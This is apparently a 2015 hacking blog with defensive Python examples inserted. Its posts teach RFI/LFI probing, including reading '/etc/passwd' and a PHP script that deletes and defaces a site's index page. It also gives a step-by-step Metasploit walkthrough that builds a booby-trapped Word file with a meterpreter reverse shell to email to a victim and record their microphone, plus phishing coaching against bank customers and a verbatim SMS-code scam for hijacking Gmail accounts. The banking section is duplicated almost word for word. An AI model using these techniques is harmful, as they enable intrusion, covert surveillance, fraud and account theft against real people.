This is a type of vulnerability that allows a user to include remote or local files and have them parsed and then executed on the server.
To see if a certain website is vulnerable to this issue, try visiting “index.php?p=http://www.<DOMAIN NAME>.com/”. If the site shows up, then it can be exploited with RFI or LFI. If a different thing appears, then the site is not vulnerable to RFI - this does not necessarily mean it is safe from LFI, however. To verify, go for “index.php?p=/etc/passwd”. This is assuming the server is running on a *nix-based system. If you can view the password file, then the server can be hacked by LFI. If something else appears, then RFI and LFI both won’t work.
If the target is found to be vulnerable to RFI, you can upload PHP code to their server. Let’s say you create the following under the file hack.php:
<?php
// Delete the site's front page.
unlink("index.php");
// Write a new front page containing only the word GOTCHA.
system("echo GOTCHA > index.php");
?>
Once you view “index.php?p=http://<DOMAIN NAME>.com/hack.php”, the code will be run on the server. When this is done, the site will change to the simple GOTCHA message and no one will be the wiser.
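From the defending side, both probes described above leave a clear trace in the web server's access log, and the fix is to stop treating `p` as a path at all. The following is an added example, not code from the original post: the log lines, the host names and the page names in `PAGES` are constructed, and `p` is assumed to be the only parameter that feeds an include.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request line and status code of a combined-format access log entry.
REQUEST_RE = re.compile(
    r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A value that begins with a URL scheme would make the include fetch a remote file.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def classify_value(value):
    """Return 'RFI', 'LFI' or None for one URL-decoded parameter value."""
    value = value.strip()
    if SCHEME_RE.match(value):
        return "RFI"          # e.g. p=http://host/...
    if value.startswith("/"):
        return "LFI"          # e.g. p=/etc/passwd (absolute local path)
    return None


def scan_access_log(lines, include_params=("p",)):
    """Flag requests whose include parameter carries a URL or an absolute path.

    Only parameters listed in include_params are inspected, so unrelated
    parameters that legitimately hold paths do not raise alerts.
    Returns (line number, client, kind, decoded value, HTTP status) tuples.
    """
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        client = line.split(" ", 1)[0]
        query = urlsplit(match.group("target")).query
        # parse_qsl percent-decodes, so p=%2Fetc%2Fpasswd is seen as /etc/passwd.
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify_value(value) if name in include_params else None
            if kind:
                findings.append(
                    (lineno, client, kind, value, int(match.group("status"))))
    return findings


# The fix: map the parameter to a fixed set of pages instead of using it as a path.
PAGES = {"home": "pages/home.php", "about": "pages/about.php"}  # hypothetical names


def resolve_page(p):
    """Return the file for a known page name; anything else falls back to home."""
    return PAGES.get(p, PAGES["home"])


# Constructed sample log lines (documentation IP ranges, .test host names).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Nov/2015:10:01:12 +0000] "GET /index.php?p=about HTTP/1.1" 200 5120',
    '198.51.100.23 - - [22/Nov/2015:10:02:40 +0000] "GET /index.php?p=http://files.example.test/ HTTP/1.1" 200 48211',
    '198.51.100.23 - - [22/Nov/2015:10:02:55 +0000] "GET /index.php?p=%2Fetc%2Fpasswd HTTP/1.1" 200 1873',
    '192.0.2.50 - - [22/Nov/2015:10:03:10 +0000] "GET /search.php?q=flights&ref=/home HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

A flagged request that was answered with status 200 deserves a closer look than one that was rejected, which is why the status code is kept in each finding.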
Hack smarter
Sunday, November 22, 2015
Friday, November 20, 2015
XSS (Cross-Site Scripting)
If you have been hanging around the Internet as much as you should have (to be a hacker, at least), you would have at least heard of this term. This allows the attacker’s input to be sent to unwary victims.
The primary use is cookie stealing - and no, not the type your sadistic older sibling does. Once the attacker steals yours, they can, under the right conditions, log into the site the cookie was stolen from using your identity.
This vulnerability can be determined using the site’s search facility. Try feeding it with some HTML, such as “<font color=green>XSS</font>”. If the word XSS comes up, then the site is vulnerable. Else, you need to find a different way in.
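The same search-box check, seen from the server side: the page is safe when the search term is encoded on output, and a session cookie marked HttpOnly cannot be read by script even if some markup does get through. This is an added example, not code from the original post; the function names, the `/search` form and the `sid` cookie name are assumptions.

```python
import html
import secrets

# The probe string used in the text above.
PROBE = "<font color=green>XSS</font>"


def render_results_unsafe(query):
    """Vulnerable pattern: the search term is pasted into the page as markup."""
    return "<p>Results for: " + query + "</p>"


def render_results_safe(query):
    """Hardened pattern: encode the term for both places it is echoed.

    html.escape with quote=True converts <, >, & and both quote characters,
    so the term is safe in element content and inside the quoted value
    attribute of the search box.
    """
    escaped = html.escape(query, quote=True)
    return ('<form action="/search"><input name="q" value="' + escaped + '"></form>'
            "<p>Results for: " + escaped + "</p>")


def reflects_markup(page, probe):
    """True when the probe came back unchanged, i.e. the browser would parse it."""
    return probe in page


def session_cookie_header():
    """Session cookie that page script cannot read and that is sent over HTTPS only."""
    token = secrets.token_urlsafe(32)
    return ("Set-Cookie", "sid=" + token + "; Path=/; HttpOnly; Secure; SameSite=Lax")


if __name__ == "__main__":
    print("unsafe page reflects markup:",
          reflects_markup(render_results_unsafe(PROBE), PROBE))
    print("safe page reflects markup:  ",
          reflects_markup(render_results_safe(PROBE), PROBE))
    print(render_results_safe(PROBE))
    print(": ".join(session_cookie_header()))
```

`reflects_markup` can be kept as a regression test for every page that echoes user input.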
Thursday, November 19, 2015
HACKING A COMPUTER
STEP 1: Like the tampered APK in the Android exploit we did, you will have to find a way to compromise the target system. The common way of doing this is sending an email with a document or a link. Within it is a listener (rootkit) that will allow the hacker to gain access to the computer.
STEP 2: When the document is downloaded and the rootkit, well, rooted, you will need to find a loophole or vulnerability that can be exploited. If you are lucky and the mark does not update his Windows system, then a few things will work such as “MS14-07” that allows the execution of remote codes from Word and Office Web Apps.
Search Metasploit for this vulnerability, and you will find “exploit/windows/fileformat/ms14_017_rtf”. Use it by typing “use exploit/windows/fileformat/ms14_017_rtf”. After loading, find out more about the exploit by typing “info”. Then, “show options”.
STEP 3: This exploit will work only in Office 2010. It can be easy to use, though, as all you need to fill in is the filename. Set it by “set FILENAME <INSERT FILENAME>”.
STEP 4: Set the payload that is needed to work in the file. Type “set PAYLOAD windows/meterpreter/reverse_tcp”. Like earlier, set the LHOST (your system’s IP) so the payload will know to call your device back. Then, type “exploit”. This will create the tampered Word file.
STEP 5: Open up a Multi-Handler for the connection back. Simply type “use exploit/multi/handler” and “set PAYLOAD windows/meterpreter/reverse_tcp”. Finally, set the LHOST to be your IP.
STEP 6: Send the infected file to the mark. If you don’t have a clue how to do this, try Googling “email”.
STEP 7: As soon as the file is opened, a meterpreter session will be active. Now comes the juicy part - on the meterpreter prompt, try running “run sound_recorder - l /root”. This will turn on the mark’s microphone and send all recorded conversations in a file and send it to your /root directory. Easy peasy! And since you are using meterpreter, you can do pretty much anything except start a fire with the keyboard. Lots of meterpreter commands are available that will give you all sorts of data - yes, all the way down to keystrokes. Again, now that you know how it is done, it should be a piece of cake to not fall victim. Always update your OS installation to take advantage of the latest security patches, and be careful of the things you download and open. If you are a Windows user, anti-virus software with rootkit detection ability can go a long way.
Wednesday, November 18, 2015
ICMP
This stands for Internet Control Message Protocol, the most used in networking. This is a connectionless protocol, meaning it will not use any port number. It is usually meant for diagnostic purposes, server querying, or error reporting. As a hacker, knowledge about this is important because you will be using ICMP a lot to send payloads. Pinging, for example, uses ICMP - and this, just like any ICMP message, has inherent security holes.
In ICMP, for example, an error message is not sent in response to another error message. When an error is sent, it carries the IP header and datagram, which detail the error’s cause and let the receiver associate the error with the specific process. This also means that when a Type 0 (echo reply) has been sent, the reply will not be a Type 8 (echo request), though a Type 8 will always elicit a Type 0.
This is taken advantage of by the “Smurf Attack”, which is nowhere near as cute as it sounds. In this technique, the attacker will spoof the ICMP packet’s source address, sending a broadcast to all computers in the network. If this traffic is not filtered, then the victim’s network will be congested, dropping its productivity. Aside from using this to Smurf the network, it can also be used to gather information by discovering all hosts on the network.
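The Smurf pattern described above can be recognised on the wire: an echo request addressed to a broadcast address, followed by echo replies converging on a host that never sent a matching request. The sketch below is an added example, not code from the original post; the addresses come from documentation ranges, the packets are constructed in memory (nothing is sent), and the threshold of three unsolicited replies is an assumption.

```python
import ipaddress
import struct
from collections import Counter

ICMP_PROTO, ECHO_REPLY, ECHO_REQUEST = 1, 0, 8


def build_packet(src, dst, icmp_type):
    """Build a constructed IPv4+ICMP sample packet (checksums left at zero)."""
    ip_header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28, 0, 0, 64, ICMP_PROTO, 0,
                            ipaddress.IPv4Address(src).packed,
                            ipaddress.IPv4Address(dst).packed)
    return ip_header + struct.pack("!BBHHH", icmp_type, 0, 0, 1, 1)


def parse_ipv4_icmp(packet):
    """Return (src, dst, icmp_type) for an IPv4 ICMP packet, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    header_len = (packet[0] & 0x0F) * 4       # IHL is counted in 32-bit words
    if header_len < 20 or packet[9] != ICMP_PROTO or len(packet) < header_len + 8:
        return None
    src = ipaddress.IPv4Address(packet[12:16])
    dst = ipaddress.IPv4Address(packet[16:20])
    return src, dst, packet[header_len]       # first ICMP byte is the type


def analyse(packets, local_net, reply_threshold=3):
    """Return (broadcast echo requests, hosts receiving unsolicited echo replies)."""
    net = ipaddress.IPv4Network(local_net)
    broadcasts = {net.broadcast_address, ipaddress.IPv4Address("255.255.255.255")}
    requested = set()        # (requester, target) pairs of ordinary pings
    broadcast_requests = []  # echo requests aimed at a broadcast address
    unsolicited = Counter()  # echo replies with no matching request, per receiver
    for packet in packets:
        parsed = parse_ipv4_icmp(packet)
        if parsed is None:
            continue
        src, dst, icmp_type = parsed
        if icmp_type == ECHO_REQUEST:
            if dst in broadcasts:
                broadcast_requests.append((str(src), str(dst)))
            else:
                requested.add((src, dst))
        elif icmp_type == ECHO_REPLY and (dst, src) not in requested:
            unsolicited[str(dst)] += 1
    victims = sorted(ip for ip, n in unsolicited.items() if n >= reply_threshold)
    return broadcast_requests, victims


# Constructed capture: one ordinary ping, then a broadcast request whose source
# address is the eventual receiver of every reply.
SAMPLE_PACKETS = [
    build_packet("192.0.2.20", "192.0.2.30", ECHO_REQUEST),
    build_packet("192.0.2.30", "192.0.2.20", ECHO_REPLY),
    build_packet("198.51.100.10", "192.0.2.255", ECHO_REQUEST),
    build_packet("192.0.2.11", "198.51.100.10", ECHO_REPLY),
    build_packet("192.0.2.12", "198.51.100.10", ECHO_REPLY),
    build_packet("192.0.2.13", "198.51.100.10", ECHO_REPLY),
    build_packet("192.0.2.14", "198.51.100.10", ECHO_REPLY),
]

if __name__ == "__main__":
    print(analyse(SAMPLE_PACKETS, "192.0.2.0/24"))
```

The filtering the text refers to is done at the network edge and on hosts: routers that do not forward directed broadcasts, and hosts that ignore broadcast echo requests (on Linux, the `net.ipv4.icmp_echo_ignore_broadcasts` sysctl).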
TCP
This stands for Transfer Control Protocol, a fixed communication protocol that is a bit more complicated and more reliable than UDP. It works with IP (Internet Protocol) in doing its job - TCP takes care of the internal communication between the application and network software, while IP takes care of communication from another computer.
Since TCP and UDP are very much alike even in terms of hacking potential, check out the next item for a great hack idea.
Tuesday, November 17, 2015
Online Banking Hacking
After learning about the different types of hacking, there is one last type to take into consideration: Internet Banking Hacking, which is considered a cyber crime in most countries of the world.
In recent years, internet banking has become a feature used by a large number of people. It has its advantages, but the main disadvantage is that once hackers get in, all the money is lost. Authorities and expert analyses estimate that in the coming years the cases of online banking hacking will grow considerably. Online banking has existed since 1980, and new methods to hack online bank accounts appear every day.
The first method you can choose for hacking an online bank account is phishing. The number of attacks of this kind against banking systems has been growing in recent years; to hack the victim you should use social engineering techniques as well.
Hackers hide under a bank identity and make their new identity look as real as possible, pretending to belong to the bank; malicious emails and advertisements are the top secret in getting into someone’s bank account without their permission or knowledge. You should adopt the typical phishing scheme and try to collect as much information as you can about your victim. Before anything else, you should know their email address and whether the victim uses this address for online banking, but don’t worry: most people do, because it’s a little too complicated to work with a couple of email addresses at a time, and people who choose internet banking are usually busy and don’t have time to follow more than one email address.
So, after you have got the email address, send an email that will get your victim’s attention and get opened. The content of the email can be something interesting, or in this case it’s better to guide your victim through a link to a specialized website that will ask for financial data and security details. Those kinds of websites are specially designed to look like an official bank site but are definitely not the original one; they are designed to be identical to the original ones.
Your email should make the victim click on a link which will guide your victim to a website which perfectly replicates a bank site.
Hackers also include attachments in the email which contain the link to the fake website, and once opened they have the same effect. Phishing emails should take the official form of notifications and emails of banks, organizations or e-payment systems; those kinds of messages request your victim’s sensitive information that will help you reach your goal. Malware specially designed for online banking hacking exists! It’s named Prg Banking Trojan.
McAfee has published a report on phishing which indicates that hackers aren’t hacking small banks; their targets are big companies, banks and organizations that make the hack operation worth doing. 37% of all banks on the globe were hacked using the phishing method at least once in the last 12 months.
Hackers attempt phishing against every sector. Hackers are predominantly interested in banking, e-payment systems, e-auctions and generally in hacking big financial organizations around the globe.
Phishers are focused on breaking into hosting providers and they succeed in most cases; hackers compromise servers and update their configuration in order to display phishing pages from a private subdirectory of each domain that the machine hosts.
Don’t forget to protect yourself even if you are trying to hack online accounts; with a little lack of attention you can lose everything, just like your victims. Don’t divulge your Internet Protocol address, read every email carefully and don’t click unless you are sure, and always ask and request more information in order to stay protected.
The second method used by hackers to break into online banking accounts is called Watering Hole, and specialists define it as an evolution of phishing attacks. With this option hackers inject malicious code into a public website visited by a small and standard group of people.
In Watering Hole attack, hackers wait for target people to visit the hacked website and they are not inviting their victims to do it, they are only waiting for them to visit the website. If you choose this method, you should use Internet Explorer and Adobe Flash Player.
Hackers using this method compromise websites that aren’t updated and configured very frequently, because they are easier to hack than an updated website; usually hackers use the exploit kits they find on the black market. Pro hackers hack the website at least six months before they attack it. This method is very efficient because the hackers and websites are very hard to locate compared to phishing attacks. After the attacks, hackers keep in touch with the website to make sure that everything is going in the direction they want.
In 2012-2014, hackers used this method to hack a regional bank in Massachusetts. The operation was successful due to the JavaScript elements on both sites, the bank in Massachusetts and a local government in the Washington DC suburbs:
Hxxp://www.xxxxxxxxtrust.com
Hxxp://xxxxxxcountrymd.gov
Another attack using this method was discovered in March 2013 when many banks in South Korea were compromised, the hackers collected sensitive data from the bank and they have also shut down their system. An interruption of their services was made on their online banking. Hackers consider this method a solution for the problems that authorities and security services and systems give them, and because they love to solve problems, they found an innovative solution in this case as well.
Research shows that most hackers make money online using this method and a lot of them are still undetected.
Hackers have a lot of ideas and they are really good; their ideas are reflected in their solutions, and that’s how the Pharming and Credit Card Redirection hack methods were born.
This method consists of hijacking a bank’s URL so that when customers access it they are automatically guided to another site which is identical to the original website. This method of hacking is a little bit more difficult than the other two methods, but not impossible. You can technically make it with one of the following techniques:
1. DNS Cache Poisoning
DNS servers exist in a bank’s, organization’s or company’s network to improve response performance. Hackers attack the DNS server by exploiting vulnerabilities in the DNS software, which make the server go wrong because it incorrectly validates the DNS response. The server will redirect people to another site because it has cached wrong entries. Usually, the server which will host the victims is managed and controlled by hackers in order to give the customers malware. Hackers can even attack customers if they provide the hackers their IP.
2. Hosts File Modification
The hosts file is used by hackers to direct customers to any website under their control.
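Because a hosts-file entry overrides DNS, a workstation normally has no reason to carry an entry for its bank at all, which makes this form of pharming easy to audit for. The following is an added example, not code from the original post; `examplebank.test` and every address in the sample file are constructed.

```python
import ipaddress


def parse_hosts(text):
    """Yield (line number, ip, hostname) for every mapping in hosts-file text."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()    # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                           # malformed line, not a mapping
        for name in fields[1:]:                # one line may map several names
            yield lineno, ip, name.rstrip(".").lower()


def audit_hosts(text, protected_domains):
    """Flag every entry that pins a protected domain, or a subdomain, to an IP.

    Returns (line number, hostname, ip) tuples. Matching is case-insensitive
    and ignores a trailing dot; a name that merely ends with the same letters
    (notexamplebank.test) is not a subdomain and is not flagged.
    """
    protected = [d.rstrip(".").lower() for d in protected_domains]
    findings = []
    for lineno, ip, name in parse_hosts(text):
        if any(name == dom or name.endswith("." + dom) for dom in protected):
            findings.append((lineno, name, str(ip)))
    return findings


# Constructed hosts file; line numbers matter for the findings.
SAMPLE_HOSTS = "\n".join([
    "127.0.0.1 localhost",
    "::1 localhost ip6-localhost",
    "# 203.0.113.66 www.examplebank.test",
    "203.0.113.66  www.examplebank.test login.examplebank.test  # constructed entry",
    "198.51.100.9 intranet.corp.test",
    "203.0.113.66 EXAMPLEBANK.TEST.",
    "203.0.113.66 notexamplebank.test",
])

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS, ["examplebank.test"]):
        print(finding)
```

On a real machine the text would be read from `/etc/hosts` or `C:\Windows\System32\drivers\etc\hosts`.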
A new technique is credit card redirection, which is used on compromised e-commerce websites to let the hackers get the sensitive information they need. This technique does not hack the customer directly: after the victim pays using the card, the hacker modifies the flow of the operation and all the money is redirected to them. Most of these attacks are made on websites that offer e-commerce services.
Hackers also break into a victim’s account by changing the credit card processing file.
Another type of attack used in online banking hacking is called malware-based attacks, and they are classified as the most dangerous attacks on the internet related to online banking services.
There are many categories of malware, but in general they are designed to hit the online financial business. The security community considers Zeus, Carberp and Spyeye the most dangerous of all. Zeus is in fact a Trojan horse which works on all versions of Windows. It was first discovered in 2007, when hackers used it to illegally obtain information about the US Department of Transportation; it’s the oldest of the three, and even NASA got hacked in 2009 using Zeus.
MIITB is maybe the most efficient method used by hackers in internet banking, where the attackers combine social engineering with malware that infects the browser of the victim. It mostly hides in the form of a BHO (Browser Helper Object); attacks are based on proxies which infect the customer’s browser by exploiting its weaknesses on the victim’s device. Malicious code is able to change the content of an online transaction between the bank and the customer.
The Zeus Trojan is also used to hack and get bank credentials by MIIT keystroke logging. Specialists consider that nine million phishing emails with Zeus were sent in 2009. According to ZeusTracker, the USA, Germany, Russia, the UK, Ukraine, Romania, the Netherlands, France, Japan and Turkey are the top ten countries hosting Zeus. Hand of Thief (HoT) is another Trojan specially designed to hack online banking; it was created to hit Linux and Mac systems, which had proved to be immune to malware. Authorities say that it was created in Russia and that it’s available to buy on some Russian underground forums; it’s capable of infecting the victims and stealing sensitive information from their machines. Grabbers and backdoor infection vectors are currently on sale with Hand of Thief for approximately $3000.
DDoS attacks are also used to hack internet banking. In the case of online banking hacking, hackers are helped by volunteers that participate in the operation; a botnet is easier to detect, and volunteers can block the whole process of detecting.
After 129 countries had been attacked with DDoS attacks, the FBI decided to share a list of more than 130.000 Internet Protocol addresses used in the attacks, attacks where the victims could not access their online or mobile banking services.
The fundamental types of DDoS attacks:
Volume-Based Attacks (VBA) - the hacker floods the site with a big quantity of data.
Protocol Attacks (PA) - the hackers try to overwhelm the target servers by exploiting network protocol failures.
Layer Seven Attacks - created to exhaust resource limits: hackers flood the target with huge amounts of HTTP requests that saturate its resources.
DDoS attacks are also used as a deflection to hide the results of an attack that is ongoing. Dirt Jumper is part of a DDoS malware group and it has an updated version called Pandora; a big number of DDoS kits have shown up, like YZF, ArmageddoN and DiWar. The FBI, FS-ISAC and IC3 are highlighting the distribution of the Dirt Jumper kit being used in bank attacks.
Using the methods from above, hackers can get money, and they are also called cyber criminals if they do this activity illegally; they can hack an unlimited number of accounts and banks until they are discovered, if they are ever discovered. Now more than ever, hackers don’t focus only on computers; they also take into consideration hacking mobile phones, which are today the result of great ideas combined with hard work. Since the phones are smart phones, they allow you to do any kind of operation you want or need, and they are way more used nowadays than computers. A lot of people use their smart phone to pay bills online or to do transactions online via internet banking services all around the world, and that’s why hackers are also focusing on smart phones and hacking their systems in order to reach a new goal or just to give themselves new challenges. Research done in 2015 highlights the importance of smart phones and shows us that smart phones are more used nowadays than computers.
In the last years, internet banking has become a feature used by a big number of people and it has its advantages, but the main disadvantage is that once hackers get into this type of hacking all the money are lost. Authorities and expert analyses estimate that in the future years the cases of online banking hacking will take a considerable growth. Online banking exists since 1980 and new methods to hack
online bank accounts are appearing everyday.
The first method you can choose for hacking an online bank account is phishing, the number of this kind of attacks are growing in the last years against banking systems, to hack the victim you should use social engineering techniques as well.
Hackers hide under a bank identity and make their new identity look as real as possible pretending to belong to the bank, malicious emails, advertisements and emails are the top secret in getting into someone’s bank account without their permission or knowledge. You should adopt the typical phishing scheme and try to collect as much information as you can about your victim, before anything else you should know their email address and if the victim uses this address for online banking but don’t worry, most of the people do it because it’s a little bit too complicated to work on
couple emails at a time and people who choose internet banking are usually busy and they don’t have time to follow more than an email address.
So, after you have got the email address, send any email that can get your victim’s attention by opening that email, the content of the email can be something interesting or in this case it’s better to guide your victim though a link to a specialized website that will ask for financial data and security details, those kind of websites are specially designed to look like an official bank account, but is
definitely not the original one, those infected websites are designed identical to the original ones.
Your email should make the victim click on a link which will guide your victim to a website which perfectly replicates a bank site.
Hackers also include in the email attachments which contain the link to the fake website and once opened it has the same effect. Phishing emails should take the official form of notifications and emails of the banks, organizations or e-payment systems, those kinds of messages request your victim’s sensitive information that will help you reach your goal. Malware specially designed for online banking hacking exist! it’s named Prg Banking Trojan.
McAfee has published a report on phishing which indicates that hackers aren’t hacking small banks, their targets are big companies, banks and organization that could worth the hack operation to be done. 37% of all banks on the globe were hacked using the phishing method in the last 12 moths at least once.
Hackers attempt to every sector by phishing it. Hackers are interested in predominantly banking, e-payment systems, e-auctions and generally in hacking big financial organizations around the globe.
Phishers are focused on breaking into hosting providers and they succeed in most of the cases, hackers disgracing servers and update their own configuration in order to display phishing pages from a private subdirectory of each domain that the machine host.
Don’t forget to protect yourself even if you are trying to hack online accounts, with a little lack of attention you can loose everything as well as your victims. Don’t divulge your Internet Protocol, read carefully every email and don’t click unless you are sure, ask and request more information always in order to keep protected.
The second method used by hackers to break into online banking accounts is called Watering Hole and specialists define it as an evolution of phishing attacks. By choosing this option hackers are injecting malicious codes onto a public website visited by a small and standard group of people.
In Watering Hole attack, hackers wait for target people to visit the hacked website and they are not inviting their victims to do it, they are only waiting for them to visit the website. If you choose this method, you should use Internet Explorer and Adobe Flash Player.
Hackers are compromising websites using this method that aren’t updated and configured very frequent because they are easily to hack than an updated website, usually hackers are using the exploit kits they find on the black square. Pro hackers hack the website at least six months before they attack it. This method is very efficient because hackers and websites can be located very
hard comparatively to phishing attacks. After the attacks hackers keep in touch with the website to make sure that everything is going in the direction they want to.
In 2012-2014, hackers used this method to hack a regional bank in Massachusetts. The operation was successful due to the JavaScript elements on both sites, the bank in Massachusetts and the local government that was under Washington DC suburbs:
Hxxp://www.xxxxxxxxtrust.com
Hxxp://xxxxxxcountrymd.gov
Another attack using this method was discovered in March 2013 when many banks in South Korea were compromised, the hackers collected sensitive data from the bank and they have also shut down their system. An interruption of their services was made on their online banking. Hackers consider this method a solution for the problems that authorities and security services and systems give them, and because they love to solve problems, they found an innovative solution in this case as well.
Researches show that most of the hackers make money online using this method and a lot of them are still undetected.
Hackers have a lot of ideas and they are really good, their ideas reflect in their solutions and that’s how Pharming and Credit Card Redirection hack method was born.
This method consists in hijacking a bank’s URL and when the customers access it they are automatically guided to another site which is identical to the original website. This method of hacking is a little bit more difficult than the other two methods, but not impossible. You can technically make it with one of the next techniques:
1. DNS Cache Poisoning
DNS’s exist in a bank’s, organization’s or company’s network to make a better response performance. Hackers attack the DNS server by exploring vulnerabilities in the DNS software, which make the server to give an error because it will incorrectly validate the DNS response. The server will redirect people to another site because it will catch wrong all the entries. Usually, the server which will host the victims is managed and controlled by hackers in order to give the customers malware. Hackers can even attack customers if they provide the hackers their IP.
2. Hosts File Modification
Hosts file is used by hackers to direct the customers on any website under their control.
A new technique is Credit card redirection which is used on disgraceful ecommerce websites to let the hackers get the sensitive information they need. This technique is not hacking the customer directly, after the victim pays using the card, the hacker modify the flow of the operation and all the money are redirected to them and most of the attacks are made on websites that offer e-commerce
services.
Hackers also break into a victim’s account by changing the credit card processing file.
Another type of attacks used in online banking hacking is called Malware based attacks and they are classified as the most dangerous attacks on the internet related to online banking services.
There are many malicious categories but in general they are designed to hit the online financial business. Security community considers Zeus, Carberp and Spyeye are considered the most dangerous of all. Zeus is in fact a Trojan horse which best works on all the versions of Windows, it was first discovered in 2007 when hackers use it to obtain illegally information about US Department of Transportation, it’s the oldest one from those three and even NASA got hacked in 2009 using Zeus.
MIITB is maybe the most efficient method used by hackers in internet banking where the ones who want to attack combine social engineering with malware which is infecting the browser of the victim. It mostly hide under the form of BHO (Browser Helper Object), attacks are based on proxies which infect the browser of the customer exploring it’s weakness on the victim’s device. Malicious codes are able to change the content of an online transaction between the bank and the customer.
The Zeus Trojan is also used to hack and get bank credentials by MIIT keystroke logging. Specialists consider that nine million phishing emails with Zeus were sent in 2009. According to ZeusTracker USA, Deutschland, Russia, UK, Ukraine, Romania, Netherlands, France, Japan and Turkey are top ten countries which are hosting Zeus. HoT- Hand on Thief is another Trojan specially designed to hack online banking, it was created to hit the Linux and Mac systems which demonstrated to be
immune to malware. Authorities say that it was created in Russia and it’s available to buy on some Russian underground forums, it’s capable of infecting the victims and stealing sensitive information from their machines. Grabbers and backdoor infection vectors are currently on sale with Hand of Thief for approximately $3000.
DDoS attacks are also used to hack internet banking. In case of online banking hacking, hackers are helped by volunteers that participate in the operation, a botnet is easier to detect and volunteers can block the whole process of detecting.
After 129 countries have been attacked with DDoS attacks, FBI decides to share a list of more than 130.000 Internet Protocol addresses used in attacks, attacks where the victims could not access their online or mobile banking services.
The fundamental types of DDoS attacks:
The ones based on volume VBA- the hacker is making an inundation with big quantity of data on the site. Protocol Attacks PA- when the hackers are trying to imbue the target servers by exploiting network protocol failures. Layer Seven Attacks- created to exhaust the resource limits when hackers make inundations with huge amounts of HTTP requests that saturate a target’s resources. DDoS attacks are also used as a deflection to hide the results of an attack that is ongoing. Dirt Jumper is a part of DDoS malware group and it has an updated version called Pandora, a big number of DDoS kits have shown up like YZF, ArmageddoN and DiWar. FBI and FS-ISAC and IC3 are highlighting the distribution of Dirt Jumper kit being used in bank attacks.
Using the methods above, hackers can get money; those who do this illegally are also called cyber criminals. They can hack an unlimited number of accounts and banks until they are discovered, if they are ever discovered. Now more than ever, hackers don’t focus only on computers. They also consider hacking mobile phones, which today are the result of great ideas combined with hard work. Since these phones are smartphones, they let you do any kind of operation you want or need, and they are used far more nowadays than computers. A lot of people around the world use their smartphone to pay bills or make transactions online through internet banking services, and that’s why hackers also focus on smartphones and on hacking their systems, whether to reach a new goal or just to give themselves new challenges. Research done in 2015 highlights the importance of smartphones and shows that they are used more nowadays than computers.
Email Hacking for Beginners and not
The fourth type of hacking is email hacking, in which hackers attempt to access an email account without permission. Electronic mail is now used more than traditional mailboxes, and today it serves mostly as a form of communication because of the options it offers. There are two types of web-based email services. The first is open: it delivers email accounts to any customer, some for free and some for a fee. The second provides email accounts controlled and organized by companies for employees, and in general for students and members only. There are three big forms of attack: spam, virus or phishing.
The first type of attack is carried out by sending huge email broadcasts with a hidden IP address or hidden email addresses. A spam message usually contains something very attractive, such as low-priced travel tickets, job offers or offers of any other kind, and to be more attractive spammers use a lot of colors and photos. Some of the victims may open the magic message, read it and get really interested in its content.
The big fun for hackers is when they hit a big company and take over its sending email and IP address. If the masters of email hacking choose a company and hack it, the company would be destroyed: its internet connection would be shut down by its Internet Service Provider (ISP), and none of its emails would reach their destinations.
Another method hackers use to get unauthorized access to someone’s email is to send them an email that hides a virus in the background. The Sobig virus is often used because it is a modern technology that creates a spamming infrastructure by taking over unwilling PCs. The third way hackers follow to hack an email is called phishing, and it consists of collecting sensitive and valuable information from other people’s emails, such as credit card numbers, user names and passwords. Many hackers use this method to get money. The risk of being hacked by phishing is very high these days, especially on Facebook and Twitter, where you give away some precious information about yourself. Social media is not as kind as it seems, and there are a lot of well-hidden secrets behind it.
There are three types of phishing. The first type is known as Spear Phishing and is used to attack targeted people, companies and organizations; 91% of email attacks are made with this kind of phishing, and most of them are successful. The next type is called Clone Phishing, and its adepts clone emails by creating identical ones. The last type is known as Whaling, a term people use to describe a high-profile attack made using the phishing method.
There is an interesting way to hack someone’s account that you can apply only by knowing his or her phone number. Let me explain how. When a person creates a new email address, it is recommended to attach a phone number for security reasons, and if you forget your email password you can set a new one if you have added your phone number, so most people add their phone numbers. It’s enough to know your victim’s phone number and email address to start.
First, go to the login page and type the email where they ask for it. After that, select the “need help?” option and select “Get a verification code on my phone: [mobile phone number]”, and the SMS will be sent to the phone number; the SMS is usually formed from six letters. After that, you should send a message to the person’s number pretending you are Google, and the message should be “Google has detected unusual activity on your account. Please respond with the code sent to your mobile device to stop unauthorized activity.” The victim will believe this message and send you the verification code, which you will enter later. After entering the code, set up a new password and we are done; check everything you want on that account.
*Note: this method works only with Gmail accounts, and it will be successful if the victim doesn’t know your number. In case the number is known by the victim, try to send the message from an unknown number.
Every one of us must take measures immediately to protect our email addresses. Big companies like Yahoo!, Gmail or Hotmail treat their customers with care by offering them high security; each one of them will notify you immediately if there is something strange and ask you to check your email or reset your password. Another good idea is to make a complicated email address with numbers, but make sure you don’t forget it! You should also choose a complex password with numbers and both upper-case and lower-case letters (I recommend creating a password with more than 12 characters). Your computer should be protected as well, so make sure you get professional, original, high-quality antivirus software like Avira or Avast. They might offer you a short trial period and after that ask you to buy it. Do it, it is totally worth it! Even a hacker should protect his computer, because you never know what could happen in the next second.
Choosing a difficult security question will increase your security, but be careful: you should remember the answer even after ten years or more if it’s needed. This option could save your email’s life, because no one will be able to surf the internet in the hope of finding something very personal about you. However, email hackers have a lot of success these days by simply getting into more and more email accounts...